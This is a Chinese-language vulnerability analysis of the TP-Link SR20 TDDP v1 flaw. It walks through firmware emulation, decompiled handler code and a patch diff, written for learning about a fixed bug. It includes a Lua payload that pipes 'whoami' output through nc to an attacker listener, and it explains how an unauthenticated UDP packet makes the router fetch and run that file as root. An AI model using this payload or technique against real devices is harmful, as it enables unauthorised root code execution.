TP Link SR20 ACE漏洞分析
这个漏洞是Matthew Garrett
在发现漏洞并将漏洞报告给官方后未得到官方回复后,将其漏洞信息公布在了个人网站上,404的大佬在复现漏洞的时候官方还未修复漏洞,但是我下载固件的时候看到了官方已经发布了最新的固件,且它的日志为Fixed the zero-day ACE vulnerability
,即修复了0day的ace漏洞,现在复现分析这个漏洞仅是以学习的目的。
前置知识
在开始进行漏洞复现之前,先对前置知识进行一定的介绍。
TDDP协议
首先是TDDP协议,TDDP协议全称是(TP-Link Device Debug Protocol)。该协议是TP-Link申请了专利的协议,该协议基于UDP协议,端口为1040端口。
根据文章,tddp协议格式如下。
第一个字节为version,即版本。tddp协议有两个版本:version1
和version2
。其中version1
不支持身份验证和对数据包载荷的加密,而version2
要求身份验证和加密。也正是因为version1
不要求身份的认证即可对设备进行调试,导致出现漏洞。
C程序调用lua脚本
要介绍一点基本的c程序调用lua脚本的原因在于该漏洞的利用,最后利用了c程序调用lua脚本。
安装lua:
sudo apt-get install libreadline7 libreadline-dev
curl -R -O http://www.lua.org/ftp/lua-5.3.5.tar.gz
tar zxf lua-5.3.5.tar.gz
cd lua-5.3.5
sudo make linux test
编写一个lua脚本demo,并命名为demo.lua
:
function config_test(para1, para2)
os.execute("whoami")
os.execute(para1)
os.execute(para2)
end
c语言调用该demo程序的示例为:
#include <lualib.h>
#include <lauxlib.h>
#include <lua.h>
int main()
{
lua_State *L = luaL_newstate();
//加载基本库
luaL_openlibs(L);
if ( !luaL_loadfile(L, "./demo.lua") )
lua_pcall(L, 0, 0, 0); //加载配置文件
lua_getglobal(L, "config_test"); //函数压栈
lua_pushstring(L, "ls"); //第一个参数"ls"压栈
lua_pushstring(L, "ifconfig"); //第二个参数压栈
lua_call(L, 2, 0); //调用函数,2个参数,0个返回值
lua_close(L);
return 0;
}
编译程序:
gcc -o call call.c -I/usr/local/include/ -L/usr/local/lib/ -llua -lm -ldl
最终运行./call
,可以看到成功执行了相应命令。
漏洞复现
根据文章的描述,漏洞的基理为:TP-Link SR20 设备运行了 V1 版本的 TDDP 协议,V1 版本无需认证,只需往 SR20 设备的 UDP 1040 端口发送数据,且数据的第二字节为 0x31
时,SR20 设备会连接发送该请求设备的 TFTP 服务下载相应的文件并使用 LUA 解释器以 root 权限来执行,这就导致存在远程代码执行漏洞。
首先是对漏洞进行复现,后面再对漏洞原理进行分析。
首先是固件下载,固件可在官网进行下载。最新的固件版本为SR20(US)_V1_190401_V1_190401.zip),此为已经修复漏洞的版本。存在漏洞的版本为SR20(US)_V1_180518_V1_180518.zip)。将两个版本的固件都下下来,后续还会使用bindiff对二者进行比对,来看是如何修复该漏洞的。
接着是环境搭建,最主要的是qemu和binwalk的安装。环境搭建的过程可以参考之前的文章,同时一键安装iot环境的脚本,也可以用用,虽然不全,但是也包含了一些,还需要手动操作的就是以系统模式运行qemu的时候还需要配置下网卡。
固件和环境都配好了以后,接下来就是解压固件,使用以下命令将漏洞版本的文件系统提取出来:
binwalk -Me sr20.bin
然后查看文件类型:
$ file ./squashfs-root/bin/busybox
./squashfs-root/bin/busybox: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-, stripped
可以看到文件是基于arm 32位的小端ELF文件。
接着使用qemu系统模式运行起来一个arm虚拟机,虚拟机的下载地址为https://people.debian.org/~aurel32/qemu/armhf/,运行命令为(需配置好网络,可参考文章):
sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2" -net nic -net tap -nographic
arm虚拟机的账号名和密码都是root,然后就是将文件系统拷贝至虚拟机里面。我之前都是用scp来传递文件的,师傅的文章是用SimpleHTTPServer来传的。
在宿主机中压缩文件系统并启动web服务:
tar jcf tar -jcf squashfs-root.tar.bz2 squashfs-root
python -m SimpleHTTPServer 80
然后在qemu虚拟机中下载文件系统:
wget http://192.168.10.1/squashfs-root.tar.bz2
tar jxf squashfs-root.tar.bz2
接着使用 chroot 切换根目录固件文件系统。
mount -o bind /dev ./squashfs-root/dev/
mount -t proc /proc/ ./squashfs-root/proc/
chroot squashfs-root sh # 切换根目录后执行新目录结构下的 sh shell
使用 chroot 后,系统读取的是新根下的目录和文件,也就是固件的目录和文件。 chroot 默认不会切换 /dev 和 /proc, 因此切换根目录前需要现挂载这两个目录。
到此可以看到已经切换到了该固件的环境
root@debian-armhf:~/work# mount -o bind /dev ./squashfs-root/dev/
root@debian-armhf:~/work# mount -t proc /proc/ ./squashfs-root/proc/
root@debian-armhf:~/work# chroot squashfs-root sh
BusyBox v1.19.4 (2018-05-18 20:52:39 PDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/ #
然后宿主机中安装ftp服务器:
sudo apt install atftpd
配置ftp服务:
vim /etc/default/atftpd
# 修改USE_INETD=true 改为 USE_INETD=false
# 修改修改/srv/tftp为相应的ftp目录,我这里为/opt/ftp
配置目录
sudo mkdir /opt/ftp_dir
sudo chmod 777 /opt/ftp_dir
启动服务
sudo systemctl start atftpd
使用sudo systemctl status atftpd
可查看服务状态。如果执行命令 sudo systemctl status atftpd
查看 atftpd 服务状态时,提示 atftpd: can't bind port :69/udp
无法绑定端口,可以执行 sudo systemctl stop inetutils-inetd.service
停用 inetutils-inetd
服务后,再执行 sudo systemctl restart atftpd
重新启动 atftpd 即可正常运行 atftpd。
前面都是准备环境的环节,接着就是复现漏洞的真正操作部分了。
首先是往ftp服务器的目录中写入payload文件,文件需由lua语言编写,且包含config_test
函数,实现功能可以随意,此处使用nc连接。
function config_test(config)
os.execute("whoami | nc 192.168.10.1 7777")
end
接着在虚拟机中启动tddp程序。
然后在宿主机中监听7777端口。
最后执行poc,就可以看到nc连回的结果了,我后面使用pwntools重写了之前的poc,因此这里就不贴出poc了,在后面再给出链接。
漏洞分析
根据漏洞描述以及相应的报告知道了漏洞出现在程序tddp
中,搜索该程序,得到该程序的路径为/usr/bin/tddp
,将该程序拖入IDA中进行分析。
程序规模不大,看起来和一般的pwn题差不多,所以我也就从main函数开始看了,经过重命名的main函数如下。
关键代码在tddp_task_handle
中,跟进去该函数,看到函数进行了内存的初始化以及socket的初始化,在端口1040进行了端口监听,同时也可以看到这些字符串也是poc执行代码中命令行界面中显示出来的字符串。
进入的关键函数为tddp_type_handle
,跟进去该函数。
可以看到该在代码里首先使用recvfrom
接收了最多0xAFC8字节的数据,然后判断第一个字节是否为1或2,根据前面说明的tddp协议的格式,知道第一个字节为version
字段。图中截出的为version
为1的情况,进入到tddp_version1_type_handle
函数中。跟进去该函数。
int __fastcall tddp_version1_type_handle(tddp_ctx *ctx, _DWORD *count)
{
uint32_t v2; // r0
__int16 v3; // r2
uint32_t v4; // r0
__int16 v5; // r2
_DWORD *v7; // [sp+0h] [bp-24h]
char *v9; // [sp+Ch] [bp-18h]
char *v10; // [sp+10h] [bp-14h]
int v11; // [sp+1Ch] [bp-8h]
v7 = count;
v10 = ctx->rev_buff;
v9 = ctx->some_buff;
ctx->some_buff[0] = 1;
switch ( ctx->rev_buff[1] ) // check type
{
case 4:
printf("[%s():%d] TDDPv1: receive CMD_AUTO_TEST\n", "tddp_parserVerOneOpt", 697);
v11 = CMD_AUTO_TEST(ctx);
break;
case 6:
printf("[%s():%d] TDDPv1: receive CMD_CONFIG_MAC\n", 103928, 638);
v11 = CMD_CONFIG_MAC(ctx);
break;
case 7:
printf("[%s():%d] TDDPv1: receive CMD_CANCEL_TEST\n", "tddp_parserVerOneOpt", 648);
v11 = CMD_CANCEL_TEST(ctx);
if ( !ctx || !(ctx->field_2C & 4) || !ctx || !(ctx->field_2C & 8) || !ctx || !(ctx->field_2C & 0x10) )
ctx->field_2C &= 0xFFFFFFFD;
ctx->rev_flag = 0;
ctx->field_2C &= 0xFFFFFFFE;
break;
case 8:
printf("[%s():%d] TDDPv1: receive CMD_REBOOT_FOR_TEST\n", "tddp_parserVerOneOpt", 702);
ctx->field_2C &= 0xFFFFFFFE;
v11 = 0;
break;
case 0xA:
printf("[%s():%d] TDDPv1: receive CMD_GET_PROD_ID\n", 103928, 643);
v11 = CMD_GET_PROD_ID(ctx);
break;
case 0xC:
printf("[%s():%d] TDDPv1: receive CMD_SYS_INIT\n", 103928, 615);
if ( ctx && ctx->field_2C & 2 )
{
v9[1] = 4;
v9[3] = 0;
v9[2] = 1;
v2 = htonl(0);
*((_WORD *)v9 + 2) = v2;
v9[6] = BYTE2(v2);
v9[7] = HIBYTE(v2);
v3 = ((unsigned __int8)v10[9] << 8) | (unsigned __int8)v10[8];
v9[8] = v10[8];
v9[9] = HIBYTE(v3);
v11 = 0;
}
else
{
ctx->field_2C &= 0xFFFFFFFE;
v11 = -10411;
}
break;
case 0xD:
printf("[%s():%d] TDDPv1: receive CMD_CONFIG_PIN\n", 103928, 682);
v11 = CMD_CONFIG_PIN(ctx);
break;
case 0x30:
printf("[%s():%d] TDDPv1: receive CMD_FTEST_USB\n", 103928, 687);
v11 = CMD_FTEST_USB(ctx);
break;
case 0x31:
printf("[%s():%d] TDDPv1: receive CMD_FTEST_CONFIG\n", "tddp_parserVerOneOpt", 692);
v11 = CMD_FTEST_CONFIG(ctx);
break;
default:
printf("[%s():%d] TDDPv1: receive unknown type: %d\n", 103928, 713, (unsigned __int8)ctx->rev_buff[1], count);
v9[1] = v10[1];
v9[3] = 2;
v9[2] = 2;
v4 = htonl(0);
*((_WORD *)v9 + 2) = v4;
v9[6] = BYTE2(v4);
v9[7] = HIBYTE(v4);
v5 = ((unsigned __int8)v10[9] << 8) | (unsigned __int8)v10[8];
v9[8] = v10[8];
v9[9] = HIBYTE(v5);
v11 = -10302;
break;
}
*v7 = ntohl(((unsigned __int8)v9[7] << 24) | ((unsigned __int8)v9[6] << 16) | ((unsigned __int8)v9[5] << 8) | (unsigned __int8)v9[4])
+ 12;
return v11;
程序判断接收数据的第二字节,并根据其类型调用相关代码。根据协议格式,第二字节为type
字段,同时根据poc,知道了出问题的类型为0x31
。看上面的代码我们知道0x31
对应为CMD_FTEST_CONFIG
,看专利说明知道该字段为配置程序:
[0049] For setting the configuration information and the configuration information, without subtype. Thus, this type of packet subtype SubType value is cleared (0x00)
跟进去该函数看是如何实现的:
可以看到该函数中就从数据中获取了字符串并形成命令cd /tmp;tftp -gr %s %s
,即实现了使用tftp
去连接过来的ip地址中下载相应的文件,并最终通过c代码调用该文件中的config_test
函数,从而实现任意代码执行。
事实上,根据最终使用的是execve
函数来执行tftp下载,该漏洞也可以形成一个命令注入漏洞。
至此,漏洞分析结束。
补丁比对
最新版本的固件已经修复了该漏洞,我想比对下厂商是如何修复该漏洞的。用bindiff将该程序与最新版本的固件中的tddp程序进行对比。
可以看到tddp_version1_type_handle
存在一定的差距,查看该函数的流程。
可以看到流程图中部分的基本块被删除了,猜测是直接将0x31
字段对应的基本块给删掉了来修复该漏洞。
点击各个基本块,可以看到确实是CMD_FTEST_CONFIG
基本块被删掉了。同时也可以在ida中确认该基本块被删除。
小结
该漏洞只能称之为任意命令执行(ACE)而不是远程命令执行(RCE)的原因似乎是因为TDDP 服务只能通过有线网络访问,连 Wi-Fi 也不能访问,没有真机,不好确认,有点可惜。
总的来说,漏洞还是很简单的。tddp第一版协议竟然未对用户进行验证就允许执行如此强大的调试功能,实在是有点不应该。
相关代码和脚本在我的github